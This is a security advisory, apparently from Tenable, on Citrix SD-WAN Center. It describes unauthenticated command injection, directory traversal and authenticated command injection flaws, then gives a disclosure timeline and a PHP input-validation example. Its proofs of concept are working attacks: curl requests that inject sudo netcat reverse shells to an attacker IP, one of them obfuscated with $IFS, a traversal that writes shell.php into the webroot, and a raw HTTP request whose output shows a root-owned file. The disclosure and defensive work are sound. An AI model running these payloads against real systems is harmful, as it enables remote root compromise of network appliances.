Multiple vulnerabilities were discovered in Citrix SD-WAN Center. Note: Since the 'www-data' user has been given 'sudo' privileges, all of the vulnerabilities can be exploited to gain root access.

#### /Collector/diagnostics/ping Unauthenticated Command Injection

The "ping" action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the ping function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ipAddress', 'pingCount', or 'packetSize'.

##### Proof of Concept

```
ncip=192.168.1.191
ncport=4444
target=192.168.1.198
curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/ping
```

#### /Collector/diagnostics/trace_route Unauthenticated Command Injection

The "trace_route" action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the trace_route function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ipAddress'.

##### Proof of Concept

```
ncip=192.168.1.191
ncport=4444
target=192.168.1.198
curl --insecure -d 'ipAddress=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60' https://$target/Collector/diagnostics/trace_route
```

#### /Collector/storagemgmt/apply Unauthenticated Command Injection

The "apply" action in StorageMgmtController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the callStoragePerl function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command.
An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying an array value with crafted values for 'action', 'host', 'path', or 'type'.

##### Proof of Concept

```
ncip=192.168.1.191
ncport=4444
target=192.168.1.198
curl --insecure 'https://'$target'/Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60sudo+/bin/nc+-nv+'$ncip'+'$ncport'+-e+/bin/bash%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype'
```

#### /Collector/nms/addModifyZTDProxy Unauthenticated Command Injection

The "addModifyZTDProxy" action in NmsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the addModifyZTDProxy function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for 'ztd_password'.

##### Proof of Concept

```
ncip=192.168.1.191
ncport=4444
target=192.168.1.198
curl --insecure 'https://'$target'/Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(sudo$IFS/bin/nc$IFS-nv$IFS$(/bin/echo$IFS-e$IFS\x3'$ncip')$IFS$(/bin/echo$IFS-e$IFS\x3'$ncport')$IFS-e$IFS/bin/bash)'
```

#### /Collector/appliancesettings/applianceSettingsFileTransfer Unauthenticated Directory Traversal File Write

The "applianceSettingsFileTransfer" action in ApplianceSettingsController is susceptible to directory traversal by a remote, unauthenticated attacker. Specifically, the applianceSettingsFileTransfer function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying crafted values for 'filename', 'filedata', and 'workspace_id'.
This vulnerability can be exploited to write files to locations writable by the 'www-data' user. Furthermore, an attacker could write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code.

##### Proof of Concept

```
ncip=192.168.1.191
ncport=4444
target=192.168.1.198
curl --insecure -d 'filename=../../../../../../home/talariuser/www/app/webroot/files/shell.php&filedata=' https://$target/Collector/appliancesettings/applianceSettingsFileTransfer
curl --insecure https://$target/talari/app/files/shell.php
```

#### /Users/create Authenticated Command Injection

The "create" action in UsersController is susceptible to command injection by a remote, authenticated attacker. Specifically, the create function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by supplying a crafted value for 'level'. Note: when $level is compared to an integer value with ==, PHP converts the non-numeric string to 0 (int), so the validation passes. A strict comparison (===) would prevent this.
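
Every finding above has the same root cause: a request parameter reaches a shell command, a file-system path, or a loosely typed comparison without allow-list validation. The following PHP is an added illustration of how each of those three parameter classes can be validated; it is not code from the advisory or from Citrix, and the function names, the numeric bounds, the regexes and the set of permitted 'level' values are all hypothetical, since the advisory does not show the affected controllers.

```php
<?php
// Added example (not code from the advisory or from Citrix): allow-list
// validation for the three parameter classes described above.  Function
// names, argument bounds and the set of valid 'level' values are hypothetical.
declare(strict_types=1);

// --- 1. Parameters that end up in a shell command (ping, trace_route,
//        storagemgmt/apply, addModifyZTDProxy).  Validate against an
//        allow-list, then pass the value as its own argv element so that no
//        shell ever parses it.  The $IFS trick in the addModifyZTDProxy PoC
//        shows why merely rejecting spaces or backticks is not enough.
function validateIp(string $ip): string
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException('ipAddress must be an IP literal');
    }
    return $ip;
}

function validateBoundedInt(string $raw, int $min, int $max): int
{
    $opts  = ['options' => ['min_range' => $min, 'max_range' => $max]];
    $value = filter_var($raw, FILTER_VALIDATE_INT, $opts);
    if ($value === false) {
        throw new InvalidArgumentException("expected an integer in [$min, $max]");
    }
    return $value;
}

function runPing(array $request): string
{
    $ip    = validateIp((string) ($request['ipAddress'] ?? ''));
    $count = validateBoundedInt((string) ($request['pingCount'] ?? ''), 1, 10);
    $size  = validateBoundedInt((string) ($request['packetSize'] ?? ''), 16, 1472);

    // PHP >= 7.4 accepts an argv array here and executes the program
    // directly, without /bin/sh, so metacharacters cannot be interpreted.
    $argv = ['/bin/ping', '-c', (string) $count, '-s', (string) $size, $ip];
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start ping');
    }
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $output;
}

// --- 2. Parameters that end up in a file-system path
//        (applianceSettingsFileTransfer).  Reduce the client-supplied name to
//        a single path component and confirm that the resolved directory is
//        the intended one before writing.  The directory should also never be
//        one the web server executes scripts from.
function safeUploadPath(string $baseDir, string $workspaceId, string $filename): string
{
    if (!preg_match('/^[0-9]+$/', $workspaceId)) {
        throw new InvalidArgumentException('workspace_id must be numeric');
    }
    // basename() strips any directory part; the regex then rejects '..',
    // leading dots and anything outside a conservative character set.
    if ($filename !== basename($filename)
        || !preg_match('/^[A-Za-z0-9_-][A-Za-z0-9._-]*$/', $filename)) {
        throw new InvalidArgumentException('filename must be a plain file name');
    }
    $base = realpath($baseDir);
    $dir  = realpath($baseDir . DIRECTORY_SEPARATOR . $workspaceId);
    if ($base === false || $dir === false
        || strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new InvalidArgumentException('workspace directory is outside the upload root');
    }
    return $dir . DIRECTORY_SEPARATOR . $filename;
}

// --- 3. Values compared loosely (Users/create 'level').  In PHP 7 a
//        non-numeric string compared to an int with == is converted to 0, so
//        a check such as `$level == 0` passes for arbitrary text.  PHP 8
//        changed that comparison, but the strict form below is correct on both.
function validateLevel(string $raw, array $allowedLevels): int
{
    $level = filter_var($raw, FILTER_VALIDATE_INT);
    if ($level === false || !in_array($level, $allowedLevels, true)) {
        throw new InvalidArgumentException('level is not one of the permitted values');
    }
    return $level;
}

// Constructed inputs: a non-numeric string of the kind the advisory's PoC
// sends in 'level', and a legitimate value.  The allowed set is hypothetical.
$allowedLevels = [0, 1, 2];
foreach (['`id`', '1'] as $candidate) {
    try {
        $level = validateLevel($candidate, $allowedLevels);
        printf("level %s accepted as %d\n", var_export($candidate, true), $level);
    } catch (InvalidArgumentException $e) {
        printf("level %s rejected: %s\n", var_export($candidate, true), $e->getMessage());
    }
}
```

A call such as `runPing(['ipAddress' => '127.0.0.1', 'pingCount' => '1', 'packetSize' => '56'])` exercises the first part on a host that has /bin/ping; any value that is not an IP literal or an in-range integer raises before a process is started. The design choice throughout is to fail closed on anything outside the allow-list rather than to strip or escape suspicious characters, which is exactly the approach the `$IFS` and loose-comparison variants in this advisory defeat.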

##### Proof of Concept

```
POST /Users/create HTTP/1.1
Host: 192.168.1.198
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.198/Users?rdx=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 149
Connection: close
Cookie: urlhashcomponent=; VWCSession=15jjk7584jmn9v5na2q6gspnc3

username=scooby&level=`sudo+touch+/var/tmp/vuln_6`&password=password&confirm_password=password&secAuth=false&csrf_token=9b97e4423f0f0bdf18e089b2de3c8e78

root@SD-WANCenter:/opt/citrix/licensing/LS# ls -l /var/tmp
total 0
-rw-r--r-- 1 ctxlsuser lmadmin 0 Apr 12 01:32 lockCITRIX
-rw-r--r-- 1 root      root    0 Apr 12 02:49 vuln_6
```

### Solution

Upgrade to version 10.2.3.

### Disclosure Timeline

- 04/17/2019 - Disclosure sent to secure@citrix.com. 90 day date is July 17, 2019.
- 04/17/2019 - Citrix acknowledges receipt of the report and assigns an identifier of CASE-7736.
- 05/01/2019 - Tenable asks for update.
- 05/01/2019 - Citrix is unable to reproduce the bugs without authentication. Asks for clarification.
- 05/02/2019 - Tenable sends new PoC's in the form of curl commands to hopefully clarify the vulnerabilities.
- 05/03/2019 - Citrix thanks Tenable for the additional details. They will be in touch as soon as they have any new information.
- 05/10/2019 - Tenable follows up to see if the new PoC's aided with the reproduction.
- 05/10/2019 - Citrix is able to reproduce the bugs without authentication. Thanks Tenable for the additional info. They do not have a schedule for the release but will keep us informed.
- 05/10/2019 - Tenable thanks Citrix for the update. Reminds Citrix of 90-day policy. Also we ask if they will make the 90-day date.
- 05/10/2019 - Tenable asks if we need to assign the CVEs and if Citrix will be releasing a bulletin.
- 05/13/2019 - Citrix will handle CVE assignment. They will also ensure all fixes and a security bulletin will be available before July 17th, 2019.
- 05/13/2019 - Tenable thanks Citrix for the update.
- 06/11/2019 - Tenable notices 10.2.3 was just released. Asks Citrix if these bugs were fixed because we can't download the new version successfully.
- 06/12/2019 - Response from Citrix: "Citrix will publish which versions have relevant fixes when we publish our Security Bulletin with respect to your findings and these issues." Citrix also reconfirms disclosure date.
- 06/12/2019 - Tenable informs Citrix that we will be moving the disclosure date to Aug 21 in order to disclose more SD-WAN vulnerabilities in bulk.
- 06/12/2019 - Citrix acknowledges the new disclosure date. Citrix will reach out closer to the disclosure date to coordinate how to credit Tenable in the security bulletin.
- 06/13/2019 - Tenable acknowledges.
- 06/26/2019 - Citrix advises that they are planning to release a public bulletin within the next two weeks. They hope to have a more specific date in the next few days. Asks Tenable how to give credit.
- 06/27/2019 - Tenable acknowledges. Asks to be updated when a more specific date is decided on. Credit looks good. Asks about CVE identifiers and the patched version number.
- 07/02/2019 - Tenable asks for an update.
- 07/02/2019 - Tenable notices that version 10.2.3 patches all issues. Advisory released.